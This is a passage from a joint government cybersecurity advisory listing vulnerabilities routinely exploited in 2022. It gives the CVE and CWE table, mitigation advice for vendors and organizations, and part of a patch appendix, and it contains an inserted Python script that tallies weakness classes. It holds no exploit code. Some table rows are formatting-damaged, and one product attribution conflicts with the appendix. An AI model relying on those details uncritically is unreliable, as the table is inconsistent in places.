In addition to the 12 vulnerabilities listed in Table 1, the authoring agencies identified vulnerabilities—listed in Table 2—that were also routinely exploited by malicious cyber actors in 2022.

_Table 2: Additional Routinely Exploited Vulnerabilities in 2022_

| CVE | Vendor | Product | Type | CWE |
|---|---|---|---|---|
| [CVE-2017-0199](<https://nvd.nist.gov/vuln/detail/CVE-2017-0199>) | Microsoft | Multiple Products | Arbitrary Code Execution | None Listed |
| [CVE-2017-11882](<https://nvd.nist.gov/vuln/detail/CVE-2017-11882>) | Microsoft | Exchange Server | Arbitrary Code Execution | [CWE-119: Improper Restriction of Operations within the Bounds of a Memory Buffer](<https://cwe.mitre.org/data/definitions/119.html>) |
| [CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>) | Ivanti | Pulse Secure Pulse Connect Secure | Arbitrary File Reading | [CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')](<https://cwe.mitre.org/data/definitions/22.html>) |
| [CVE-2019-0708](<https://nvd.nist.gov/vuln/detail/CVE-2019-0708>) | Microsoft | Remote Desktop Services | RCE | [CWE-416: Use After Free](<https://cwe.mitre.org/data/definitions/416.html>) |
| [CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>) | Citrix | Application Delivery Controller and Gateway | Arbitrary Code Execution | [CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')](<https://cwe.mitre.org/data/definitions/22.html>) |
| [CVE-2020-5902](<https://nvd.nist.gov/vuln/detail/CVE-2020-5902>) | F5 Networks | BIG-IP | RCE | [CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')](<https://cwe.mitre.org/data/definitions/22.html>) |
| [CVE-2020-1472](<https://nvd.nist.gov/vuln/detail/CVE-2020-1472>) | Microsoft | Multiple Products | Privilege Escalation | [CWE-330: Use of Insufficiently Random Values](<https://cwe.mitre.org/data/definitions/330.html>) |
| [CVE-2020-14882](<https://nvd.nist.gov/vuln/detail/CVE-2020-14882>) | Oracle | WebLogic Server | RCE | None Listed |
| [CVE-2020-14883](<https://nvd.nist.gov/vuln/detail/CVE-2020-14883>) | Oracle | WebLogic Server | RCE | None Listed |
| [CVE-2021-20016](<https://nvd.nist.gov/vuln/detail/CVE-2021-20016>) | SonicWALL | SSLVPN SMA100 | SQL Injection | [CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')](<https://cwe.mitre.org/data/definitions/89.html>) |
| [CVE-2021-26855](<https://nvd.nist.gov/vuln/detail/CVE-2021-26855>) (ProxyLogon) | Microsoft | Exchange Server | RCE | [CWE-918: Server-Side Request Forgery (SSRF)](<https://cwe.mitre.org/data/definitions/918.html>) |
| [CVE-2021-27065](<https://nvd.nist.gov/vuln/detail/CVE-2021-27065>) (ProxyLogon) | Microsoft | Exchange Server | RCE | [CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')](<https://cwe.mitre.org/data/definitions/22.html>) |
| [CVE-2021-26858](<https://nvd.nist.gov/vuln/detail/CVE-2021-26858>) (ProxyLogon) | Microsoft | Exchange Server | RCE | None Listed |
| [CVE-2021-26857](<https://nvd.nist.gov/vuln/detail/CVE-2021-26857>) (ProxyLogon) | Microsoft | Exchange Server | RCE | [CWE-502: Deserialization of Untrusted Data](<https://cwe.mitre.org/data/definitions/502.html>) |
| [CVE-2021-20021](<https://nvd.nist.gov/vuln/detail/CVE-2021-20021>) | SonicWALL | Email Security | Privilege Escalation Exploit Chain | [CWE-269: Improper Privilege Management](<https://cwe.mitre.org/data/definitions/269.html>) |
| [CVE-2021-40438](<https://nvd.nist.gov/vuln/detail/CVE-2021-40438>) | Apache | HTTP Server | Server-Side Request Forgery | [CWE-918: Server-Side Request Forgery (SSRF)](<https://cwe.mitre.org/data/definitions/918.html>) |
| [CVE-2021-41773](<https://nvd.nist.gov/vuln/detail/CVE-2021-41773>) | Apache | HTTP Server | Server Path Traversal | [CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')](<https://cwe.mitre.org/data/definitions/22.html>) |
| [CVE-2021-42013](<https://nvd.nist.gov/vuln/detail/CVE-2021-42013>) | Apache | HTTP Server | Server Path Traversal | [CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')](<https://cwe.mitre.org/data/definitions/22.html>) |
| [CVE-2021-20038](<https://nvd.nist.gov/vuln/detail/CVE-2021-20038>) | SonicWall | SMA 100 Series Appliances | Stack-based Buffer Overflow | [CWE-787: Out-of-bounds |
Write](<https://cwe.mitre.org/data/definitions/787.html> \"CWE-787: Out-of-bounds Write\" )\n\n[CWE-121: Stack-based Buffer Overflow](<http://cwe.mitre.org/data/definitions/121.html> \"CWE-121: Stack-based Buffer Overflow\" ) \n \n[CVE-2021-45046](<https://nvd.nist.gov/vuln/detail/CVE-2021-45046> \"CVE-2021-45046\" )\n\n| \n\nApache\n\n| \n\nLog4j\n\n| \n\nRCE\n\n| \n\n[CWE-917: Improper Neutralization of Special Elements used in an Expression Language Statement ('Expression Language Injection')](<https://cwe.mitre.org/data/definitions/917.html> \"CWE-917: Improper Neutralization of Special Elements used in an Expression Language Statement \\('Expression Language Injection'\\)\" ) \n \n[CVE-2022-42475](<https://nvd.nist.gov/vuln/detail/CVE-2022-42475> \"CVE-2022-42475\" )\n\n| \n\nFortinet\n\n| \n\nFortiOS\n\n| \n\nHeap-based Buffer Overflow\n\n| \n\n[CWE-787: Out-of-bounds Write](<https://cwe.mitre.org/data/definitions/787.html> \"CWE-787: Out-of-bounds Write\" ) \n \n[CVE-2022-24682](<https://nvd.nist.gov/vuln/detail/CVE-2022-24682> \"CVE-2022-24682\" )\n\n| \n\nZimbra\n\n| \n\nCollaboration Suite\n\n| \n\n\u2018Cross-site Scripting\u2019\n\n| \n\n[CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')](<https://cwe.mitre.org/data/definitions/79.html> \"CWE-79: Improper Neutralization of Input During Web Page Generation \\('Cross-site Scripting'\\)\" ) \n \n[CVE-2022-22536](<https://nvd.nist.gov/vuln/detail/CVE-2022-22536> \"CVE-2022-22536\" )\n\n| \n\nSAP\n\n| \n\nInternet Communication Manager (ICM)\n\n| \n\nHTTP Request Smuggling\n\n| \n\n[CWE-444: Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling')](<https://cwe.mitre.org/data/definitions/444.html> \"CWE-444: Inconsistent Interpretation of HTTP Requests \\('HTTP Request/Response Smuggling'\\)\" ) \n \n[CVE-2022-22963](<https://nvd.nist.gov/vuln/detail/CVE-2022-22963> \"CVE-2022-22963\" )\n\n| \n\nVMware Tanzu\n\n| \n\nSpring Cloud\n\n| 
\n\nRCE\n\n| \n\n[CWE-94: Improper Control of Generation of Code ('Code Injection')](<https://cwe.mitre.org/data/definitions/94.html> \"CWE-94: Improper Control of Generation of Code \\('Code Injection'\\)\" )\n\n[CWE-917: Improper Neutralization of Special Elements used in an Expression Language Statement ('Expression Language Injection')](<https://cwe.mitre.org/data/definitions/917.html> \"CWE-917: Improper Neutralization of Special Elements used in an Expression Language Statement \\('Expression Language Injection'\\)\" ) \n \n[CVE-2022-29464](<https://nvd.nist.gov/vuln/detail/CVE-2022-29464> \"CVE-2022-29464\" )\n\n| \n\nWSO2\n\n| \n\nMultiple Products\n\n| \n\nRCE\n\n| \n\n[CWE-434: Unrestricted Upload of File with Dangerous Type](<https://cwe.mitre.org/data/definitions/434.html> \"CWE-434: Unrestricted Upload of File with Dangerous Type\" ) \n \n[CVE-2022-27924](<https://nvd.nist.gov/vuln/detail/CVE-2022-27924> \"CVE-2022-27924\" )\n\n| \n\nZimbra\n\n| \n\nZimbra Collaboration Suite\n\n| \n\nCommand Injection\n\n| \n\n[CWE-74: Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')](<https://cwe.mitre.org/data/definitions/74.html> \"CWE-74: Improper Neutralization of Special Elements in Output Used by a Downstream Component \\('Injection'\\)\" ) \n \n[CVE-2022-22047](<https://nvd.nist.gov/vuln/detail/CVE-2022-22047> \"CVE-2022-22047\" )\n\n| \n\nMicrosoft\n\n| \n\nWindows CSRSS\n\n| \n\nElevation of Privilege\n\n| \n\n[CWE-269: Improper Privilege Management](<https://cwe.mitre.org/data/definitions/269.html> \"CWE-269: Improper Privilege Management\" ) \n \n[CVE-2022-27593](<https://nvd.nist.gov/vuln/detail/CVE-2022-27593> \"CVE-2022-27593\" )\n\n| \n\nQNAP\n\n| \n\nQNAP NAS\n\n| \n\nExternally Controlled Reference\n\n| \n\n[CWE-610: Externally Controlled Reference to a Resource in Another Sphere](<https://cwe.mitre.org/data/definitions/610.html> \"CWE-610: Externally Controlled Reference to a Resource in Another 
Sphere\" ) \n \n[CVE-2022-41082](<https://nvd.nist.gov/vuln/detail/CVE-2022-41082> \"CVE-2022-41082\" )\n\n| \n\nMicrosoft\n\n| \n\nExchange Server\n\n| \n\nPrivilege Escalation\n\n| \n\nNone Listed \n \n[CVE-2022-40684](<https://nvd.nist.gov/vuln/detail/CVE-2022-40684> \"CVE-2022-40684\" )\n\n| \n\nFortinet\n\n| \n\nFortiOS, FortiProxy, FortiSwitchManager\n\n| \n\nAuthentication Bypass\n\n| \n\n[CWE-306: Missing Authentication for Critical Function](<https://cwe.mitre.org/data/definitions/306.html> \"CWE-306: Missing Authentication for Critical Function\" ) \n \n### **MITIGATIONS**\n\n#### **Vendors and Developers**\n\nThe authoring agencies recommend vendors and developers take the following steps to ensure their products are secure by design and default:\n\n * **Identify repeatedly exploited classes of vulnerability. **Perform an analysis of both CVEs and known exploited vulnerabilities to understand which classes of vulnerability are identified more than others. Implement appropriate mitigations to eliminate those classes of vulnerability. For example, if a product has several instances of SQL injection vulnerabilities, ensure all database queries in the product use parameterized queries, and prohibit other forms of queries.\n * **Ensure business leaders are responsible for security. **Business leaders should ensure that proactive steps to eliminate entire classes of security vulnerabilities, rather than only making one-off patches when new vulnerabilities are discovered.\n * **Follow the SSDF** ([SP 800-218](<https://csrc.nist.gov/publications/detail/sp/800-218/final> \"NIST SP 800-218\" )_)_ and implement secure design practices into each stage of the SDLC. 
Pay attention to:
   * Prioritizing the use of memory safe languages wherever possible [[SSDF PW.6.1](<https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-218.pdf>)].
   * Exercising due diligence when selecting software components (e.g., software libraries, modules, middleware, frameworks) to ensure robust security in consumer software products [[SSDF PW.4.1](<https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-218.pdf>)].
   * Setting up secure development team practices; this includes conducting peer code reviews, working to a common organization secure coding standard, and maintaining awareness of language-specific security concerns [[SSDF PW.5.1, PW.7.1, PW.7.2](<https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-218.pdf>)].
   * Establishing a [vulnerability disclosure program](<https://www.cyber.gov.au/resources-business-and-government/governance-and-user-education/governance/vulnerability-disclosure-programs-explained>) to verify and resolve security vulnerabilities disclosed by people who may be internal or external to the organization [[SSDF RV.1.3](<https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-218.pdf>)]. As part of this, establish processes to determine root causes of discovered vulnerabilities.
   * Using static and dynamic application security testing (SAST/DAST) tools to analyze product source code and application behavior to detect error-prone practices [[SSDF PW.7.2, PW.8.2](<https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-218.pdf>)].
   * Configuring production-ready products to have the most secure settings as default and providing guidance on the risks of changing each setting [[SSDF PW.9.1, PW.9.2](<https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-218.pdf>)].
 * **Prioritize secure-by-default configurations** such as eliminating default passwords, implementing single sign-on (SSO) technology via modern open standards, and providing high-quality audit logs to customers with no additional configuration and at no extra charge.
 * **Ensure published CVEs include the proper CWE field identifying the root cause of the vulnerability** to enable industry-wide analysis of software security and design flaws.

For more information on designing secure-by-design and -default products, including additional recommended secure-by-default configurations, see the joint guide [Shifting the Balance of Cybersecurity Risk: Principles and Approaches for Security-by-Design and -Default](<https://www.cisa.gov/resources-tools/resources/secure-by-design-and-default>).

#### **End-User Organizations**

The authoring agencies recommend end-user organizations implement the mitigations below to improve their cybersecurity posture on the basis of the threat actors’ activity. These mitigations align with the cross-sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST).
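The class-level analysis that the first vendor recommendation above calls for, as an added example that is not part of the advisory: a Python tally of the CWE classes assigned to the CVEs in Table 2. The rows are transcribed from that table; the functions (`tally_cwes`, `recurring_classes`, `missing_cwe_ratio`, `cves_in_class`) and the counting logic are ours, and the script also reports how many entries carry no CWE at all, the gap the last vendor recommendation asks to close.

```python
"""Tally the weakness classes (CWEs) behind a set of exploited CVEs.

Added example, not code from the advisory: the rows below are transcribed
from the advisory's Table 2 (CVE and CWE columns); the counting logic is ours.
"""
from collections import Counter
from typing import List, Tuple

Row = Tuple[str, List[str]]

# Constructed from the advisory's Table 2. A CVE whose CWE column reads
# "None Listed" carries an empty list; two rows carry two CWEs each.
TABLE_2: List[Row] = [
    ("CVE-2017-0199", []),
    ("CVE-2017-11882", ["CWE-119"]),
    ("CVE-2019-11510", ["CWE-22"]),
    ("CVE-2019-0708", ["CWE-416"]),
    ("CVE-2019-19781", ["CWE-22"]),
    ("CVE-2020-5902", ["CWE-22"]),
    ("CVE-2020-1472", ["CWE-330"]),
    ("CVE-2020-14882", []),
    ("CVE-2020-14883", []),
    ("CVE-2021-20016", ["CWE-89"]),
    ("CVE-2021-26855", ["CWE-918"]),
    ("CVE-2021-27065", ["CWE-22"]),
    ("CVE-2021-26858", []),
    ("CVE-2021-26857", ["CWE-502"]),
    ("CVE-2021-20021", ["CWE-269"]),
    ("CVE-2021-40438", ["CWE-918"]),
    ("CVE-2021-41773", ["CWE-22"]),
    ("CVE-2021-42013", ["CWE-22"]),
    ("CVE-2021-20038", ["CWE-787", "CWE-121"]),
    ("CVE-2021-45046", ["CWE-917"]),
    ("CVE-2022-42475", ["CWE-787"]),
    ("CVE-2022-24682", ["CWE-79"]),
    ("CVE-2022-22536", ["CWE-444"]),
    ("CVE-2022-22963", ["CWE-94", "CWE-917"]),
    ("CVE-2022-29464", ["CWE-434"]),
    ("CVE-2022-27924", ["CWE-74"]),
    ("CVE-2022-22047", ["CWE-269"]),
    ("CVE-2022-27593", ["CWE-610"]),
    ("CVE-2022-41082", []),
    ("CVE-2022-40684", ["CWE-306"]),
]

NONE_LISTED = "None Listed"


def tally_cwes(rows: List[Row]) -> Counter:
    """Count CVEs per CWE. A CVE with two CWEs counts once toward each;
    a CVE with no CWE is counted under NONE_LISTED."""
    counts: Counter = Counter()
    for _cve, cwes in rows:
        if not cwes:
            counts[NONE_LISTED] += 1
        for cwe in cwes:
            counts[cwe] += 1
    return counts


def recurring_classes(rows: List[Row], min_count: int = 2) -> List[Tuple[str, int]]:
    """Weakness classes seen at least min_count times, most frequent first
    (ties broken by CWE number). These are the candidates for a class-wide
    fix, such as parameterized queries for every CWE-89 finding."""
    counts = tally_cwes(rows)
    counts.pop(NONE_LISTED, None)
    hits = [(cwe, n) for cwe, n in counts.items() if n >= min_count]
    return sorted(hits, key=lambda item: (-item[1], int(item[0].split("-")[1])))


def missing_cwe_ratio(rows: List[Row]) -> float:
    """Share of CVEs with no CWE at all: entries that cannot be analysed by
    class until the vendor publishes the proper CWE field."""
    missing = sum(1 for _cve, cwes in rows if not cwes)
    return missing / len(rows)


def cves_in_class(rows: List[Row], cwe: str) -> List[str]:
    """CVEs that share one weakness class, for drilling into a recurring class."""
    return [cve for cve, cwes in rows if cwe in cwes]


if __name__ == "__main__":
    for cwe, n in recurring_classes(TABLE_2):
        print(f"{cwe}: {n} CVEs -> {', '.join(cves_in_class(TABLE_2, cwe))}")
    print(f"CVEs with no CWE listed: {missing_cwe_ratio(TABLE_2):.0%}")
```

On this table the script reports path traversal (CWE-22) as the dominant class, six of the thirty entries, while five entries have no CWE assigned at all.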
The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA’s [Cross-Sector Cybersecurity Performance Goals](<https://www.cisa.gov/cross-sector-cybersecurity-performance-goals>) for more information on CPGs, including additional recommended baseline protections.

#### **_Vulnerability and Configuration Management_**

 * **Update software, operating systems, applications, and firmware on IT network assets in a timely manner** [CPG 1.E]. Prioritize patching [known exploited vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>), especially the CVEs identified in this CSA, then critical and high vulnerabilities that allow for remote code execution or denial of service on internet-facing equipment. For patch information on CVEs identified in this CSA, refer to the appendix.
   * If a patch for a known exploited or critical vulnerability cannot be quickly applied, implement vendor-approved workarounds.
   * Replace end-of-life software (i.e., software no longer supported by the vendor).
 * **Routinely perform automated asset discovery** across the entire estate to identify and catalogue all systems, services, hardware, and software.
 * **Implement a robust patch management process** and centralized patch management system that establishes prioritization of patch applications [CPG 1.A].
   * Organizations that are unable to perform rapid scanning and patching of internet-facing systems should consider moving these services to mature, reputable cloud service providers (CSPs) or other managed service providers (MSPs). Reputable MSPs can patch applications (such as webmail, file storage, file sharing, and chat and other employee collaboration tools) for their customers. However, MSPs and CSPs can expand their customers’ attack surface and may introduce unanticipated risks, so organizations should proactively collaborate with their MSPs and CSPs to jointly reduce risk [CPG 1.F]. For more information and guidance, see the following resources:
     * CISA Insights: Risk Considerations for Managed Service Provider Customers
     * CISA Insights: Mitigations and Hardening Guidance for MSPs and Small- and Mid-sized Businesses
     * ACSC advice on [How to Manage Your Security When Engaging a Managed Service Provider](<https://www.cyber.gov.au/resources-business-and-government/maintaining-devices-and-systems/outsourcing-and-procurement/managed-services/how-manage-your-security-when-engaging-managed-service-provider>)
 * **Document secure baseline configurations for all IT/OT components**, including cloud infrastructure. Monitor, examine, and document any deviations from the initial secure baseline [CPG 2.O].
 * **Perform regular secure system backups** and create known-good copies of all device configurations for repairs and/or restoration. Store copies off-network in physically secure locations and test regularly [CPG 2.R].
 * **Maintain an updated cybersecurity incident response plan** that is tested at least annually and updated within a risk-informed time frame to ensure its effectiveness [CPG 2.S].

#### **_Identity and Access Management_**

 * **Enforce phishing-resistant multifactor authentication (MFA) for all users**, without exception [CPG 2.H].
 * **Enforce MFA on all VPN connections**.
If MFA is unavailable, require employees engaging in remote work to use strong passwords [CPG 2.A, 2.B, 2.C, 2.D, 2.G].
 * **Regularly review, validate, or remove privileged accounts** (annually at a minimum) [CPG 2.D, 2.E].
 * **Configure access control under the principle of least privilege** [CPG 2.Q].
   * Ensure software service accounts only provide the permissions necessary (least privilege) to perform their intended functions, using non-administrative privileges where feasible.

**Note:** See CISA’s Capacity Enhancement Guide – Implementing Strong Authentication and ACSC’s guidance on [Implementing Multi-Factor Authentication](<https://www.cyber.gov.au/resources-business-and-government/maintaining-devices-and-systems/system-hardening-and-administration/system-hardening/implementing-multi-factor-authentication>) for more information on authentication system hardening.

#### **_Protective Controls and Architecture_**

 * **Properly configure and secure internet-facing network devices**, disable unused or unnecessary network ports and protocols, encrypt network traffic, and disable unused network services and devices [CPG 2.V, 2.W, 2.X].
   * Harden commonly exploited enterprise network services, including Link-Local Multicast Name Resolution (LLMNR) protocol, Remote Desktop Protocol (RDP), Common Internet File System (CIFS), Active Directory, and OpenLDAP.
   * Manage Windows Key Distribution Center (KDC) accounts (e.g., KRBTGT) to minimize Golden Ticket attacks and Kerberoasting.
   * Strictly control the use of native scripting applications, such as command-line, PowerShell, WinRM, Windows Management Instrumentation (WMI), and Distributed Component Object Model (DCOM).
 * **Implement Zero Trust Network Architecture (ZTNA)** to limit or block lateral movement by controlling access to applications, devices, and databases. Use private virtual local area networks [CPG 2.F, 2.X].

**Note:** See the Department of Defense’s [Zero Trust Reference Architecture](<https://dodcio.defense.gov/Portals/0/Documents/Library/(U)ZT_RA_v2.0(U)_Sep22.pdf>) for additional information on Zero Trust.

 * **Continuously monitor the attack surface** and investigate abnormal activity that may indicate cyber actor or malware lateral movement [CPG 2.T].
   * Use security tools, such as endpoint detection and response (EDR) and security information and event management (SIEM) tools. Consider using an information technology asset management (ITAM) solution to ensure EDR, SIEM, vulnerability scanner, and other similar tools are reporting the same number of assets [CPG 2.T, 2.V].
   * Use web application firewalls to monitor and filter web traffic. These tools are commercially available via hardware, software, and cloud-based solutions, and may detect and mitigate exploitation attempts where a cyber actor sends a malicious web request to an unpatched device [CPG 2.B, 2.F].
   * Implement an administrative policy and/or automated process configured to monitor unwanted hardware, software, or programs against an allowlist with specified approved versions [CPG 2.Q].
   * Use a network protocol analyzer to examine captured data, including packet-level data.

#### **_Supply Chain Security_**

 * **Reduce third-party applications and unique system/application builds**; provide exceptions only if required to support business-critical functions [CPG 2.Q].
 * Ensure contracts require vendors and/or third-party service providers to:
   * Provide notification of security incidents and vulnerabilities within a risk-informed time frame [CPG 1.G, 1.H, 1.I].
   * Supply a Software Bill of Materials (SBOM) with all products to enhance vulnerability monitoring and to help reduce time to respond to identified vulnerabilities [CPG 4.B].
 * **Ask your software providers to discuss their secure by design program** and to provide links to information about how they are working to remove classes of vulnerabilities and to set secure default settings.

### **RESOURCES**

 * For information on the top vulnerabilities routinely exploited in 2016 through 2019, 2020, and 2021, see:
   * Joint CSA [Top 10 Routinely Exploited Vulnerabilities](<https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-133a>)
   * Joint CSA [Top Routinely Exploited Vulnerabilities](<https://www.cisa.gov/uscert/ncas/alerts/aa21-209a>)
   * Joint CSA [2021 Top Routinely Exploited Vulnerabilities](<https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-117a>)
 * See the appendix for additional partner resources on the vulnerabilities mentioned in this CSA.
 * See ACSC’s [Essential Eight mitigation strategies](<https://www.cyber.gov.au/resources-business-and-government/essential-cyber-security/essential-eight/essential-eight-maturity-model>) for additional mitigations.
 * See ACSC’s [Cyber Supply Chain Risk Management](<https://www.cyber.gov.au/resources-business-and-government/maintaining-devices-and-systems/outsourcing-and-procurement/cyber-supply-chains/cyber-supply-chain-risk-management>) for additional considerations and advice.

### DISCLAIMER

The information in this report is being provided “as is” for informational purposes only. CISA, FBI, NSA, ACSC, CCCS, NCSC-NZ, CERT NZ, and NCSC-UK do not endorse any commercial product or service, including any subjects of analysis.
Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring.\n\n### **PURPOSE**\n\nThis document was developed by CISA, NSA, FBI, ACSC, CCCS, NCSC-NZ, CERT NZ, and NCSC-UK in furtherance of their respective cybersecurity missions, including their responsibilities to develop and issue cybersecurity specifications and mitigations.\n\n### **REFERENCES**\n\n[1] [Apache Log4j Vulnerability Guidance](<https://www.cisa.gov/news-events/news/apache-log4j-vulnerability-guidance> \"Apache Log4j Vulnerability Guidance\" )\n\n### **VERSION HISTORY**\n\nAugust 3, 2023: Initial version.\n\n### **APPENDIX: PATCH INFORMATION AND ADDITIONAL RESOURCES FOR TOP EXPLOITED VULNERABILITIES**\n\n**CVE**\n\n| \n\n**Vendor**\n\n| \n\n**Affected Products and Versions**\n\n| \n\n**Patch Information**\n\n| \n\n**Resources** \n \n---|---|---|---|--- \n \n[CVE-2017-0199](<https://nvd.nist.gov/vuln/detail/CVE-2017-0199> \"CVE-2017-0199\" )\n\n| \n\nMicrosoft\n\n| \n\nMultiple Products\n\n| \n\n[Microsoft Office/WordPad Remote Code Execution Vulnerability w/Windows](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0199> \"Microsoft Office/WordPad Remote Code Execution Vulnerability w/Windows\" )\n\n| \n \n[CVE-2017-11882](<https://nvd.nist.gov/vuln/detail/CVE-2017-11882> \"CVE-2017-11882\" )\n\n| \n\nMicrosoft\n\n| \n\nOffice, Multiple Versions\n\n| \n\n[Microsoft Office Memory Corruption Vulnerability, CVE-2017-11882](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-11882> \"Microsoft Office Memory Corruption Vulnerability\" )\n\n| \n \n[CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379> \"CVE-2018-13379\" )\n\n| \n\nFortinet\n\n| \n\nFortiOS and FortiProxy 2.0.2, 2.0.1, 2.0.0, 1.2.8, 1.2.7, 1.2.6, 1.2.5, 1.2.4, 1.2.3, 1.2.2, 1.2.1, 1.2.0, 1.1.6\n\n| \n\n[FortiProxy - system file leak through SSL VPN special 
crafted HTTP resource requests](<https://www.fortiguard.com/psirt/FG-IR-20-233> \"FortiProxy - system file leak through SSL VPN special crafted HTTP resource requests\" )\n\n| \n\nJoint CSAs:\n\n[Iranian Government-Sponsored APT Cyber Actors Exploiting Microsoft Exchange and Fortinet Vulnerabilities in Furtherance of Malicious Activities](<https://www.cisa.gov/news-events/cybersecurity-advisories/aa21-321a> \"Iranian Government-Sponsored APT Cyber Actors Exploiting Microsoft Exchange and Fortinet Vulnerabilities in Furtherance of Malicious Activities\" )\n\n[Russian State-Sponsored Cyber Actors Target Cleared Defense Contractor Networks to Obtain Sensitive U.S. Defense Information and Technology](<https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-047a> \"Russian State-Sponsored Cyber Actors Target Cleared Defense Contractor Networks to Obtain Sensitive U.S. Defense Information and Technology\" )\n\n[APT Actors Chaining Vulnerabilities Against SLTT, Critical Infrastructure, and Elections Organizations](<https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-283a> \"APT Actors Chaining Vulnerabilities Against SLTT, Critical Infrastructure, and Elections Organizations\" ) \n \n[CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510> \"CVE-2019-11510\" )\n\n| \n\nIvanti\n\n| \n\nPulse Secure Pulse Connect Secure versions, 9.0R1 to 9.0R3.3, 8.3R1 to 8.3R7, and 8.2R1 to 8.2R12\n\n| \n\n[SA44101 - 2019-04: Out-of-Cycle Advisory: Multiple vulnerabilities resolved in Pulse Connect Secure / Pulse Policy Secure 9.0RX](<https://forums.ivanti.com/s/article/SA44101?language=en_US> \"SA44101 - 2019-04: Out-of-Cycle Advisory: Multiple vulnerabilities resolved in Pulse Connect Secure / Pulse Policy Secure 9.0RX\" )\n\n| \n\nCISA Alerts:\n\n[Continued Exploitation of Pulse Secure VPN Vulnerability](<https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-010a> \"Continued Exploitation of Pulse Secure VPN Vulnerability\" )\n\n[Chinese Ministry of 
State Security-Affiliated Cyber Threat Actor Activity](<https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-258a> \"Chinese Ministry of State Security-Affiliated Cyber Threat Actor Activity\" )\n\nACSC Advisory:\n\n[2019-129: Recommendations to mitigate vulnerability in Pulse Connect Secure VPN Software](<https://www.cyber.gov.au/about-us/advisories/2019-129-recommendations-mitigate-vulnerability-pulse-connect-secure-vpn-software> \"2019-129: Recommendations to mitigate vulnerability in Pulse Connect Secure VPN Software\" )\n\nJoint CSA:\n\n[APT Actors Chaining Vulnerabilities Against SLTT, Critical Infrastructure, and Elections Organizations](<https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-283a> \"APT Actors Chaining Vulnerabilities Against SLTT, Critical Infrastructure, and Elections Organizations\" )\n\n_CCCS Alert:_\n\n[APT Actors Target U.S. and Allied Networks - Update 1](<https://www.cyber.gc.ca/en/alerts/apt-actors-target-us-and-allied-networks-nsacisafbi> \"Alert - APT Actors Target U.S. 
and Allied Networks - update 1\" ) \n \n[CVE-2019-0708](<https://nvd.nist.gov/vuln/detail/CVE-2019-0708> \"CVE-2019-0708\" )\n\n| \n\nMicrosoft\n\n| \n\nRemote Desktop Services\n\n| \n\n[Remote Desktop Services Remote Code Execution Vulnerability](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2019-0708> \"Remote Desktop Services Remote Code Execution Vulnerability\" )\n\n| \n \n[CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781> \"CVE-2019-19781\" )\n\n| \n\nCitrix\n\n| \n\nADC and Gateway version 13.0 all supported builds before 13.0.47.24\n\nNetScaler ADC and NetScaler Gateway, version 12.1 all supported builds before 12.1.55.18; version 12.0 all supported builds before 12.0.63.13; version 11.1 all supported builds before 11.1.63.15; version 10.5 all supported builds before 10.5.70.12\n\nSD-WAN WANOP appliance models 4000-WO, 4100-WO, 5000-WO, and 5100-WO all supported software release builds before 10.2.6b and 11.0.3b\n\n| \n\n[CVE-2019-19781 - Vulnerability in Citrix Application Delivery Controller, Citrix Gateway, and Citrix SD-WAN WANOP appliance](<https://support.citrix.com/article/CTX267027/cve201919781-vulnerability-in-citrix-application-delivery-controller-citrix-gateway-and-citrix-sdwan-wanop-appliance> \"CVE-2019-19781 - Vulnerability in Citrix Application Delivery Controller, Citrix Gateway, and Citrix SD-WAN WANOP appliance\" )\n\n| \n\nJoint CSAs:\n\n[APT Actors Chaining Vulnerabilities Against SLTT, Critical Infrastructure, and Elections Organizations](<https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-283a> \"APT Actors Chaining Vulnerabilities Against SLTT, Critical Infrastructure, and Elections Organizations\" )\n\n[Chinese Ministry of State Security-Affiliated Cyber Threat Actor Activity](<https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-258a> \"Chinese Ministry of State Security-Affiliated Cyber Threat Actor Activity\" )\n\n_CCCS Alert:_\n\n[Detecting Compromises relating to Citrix 
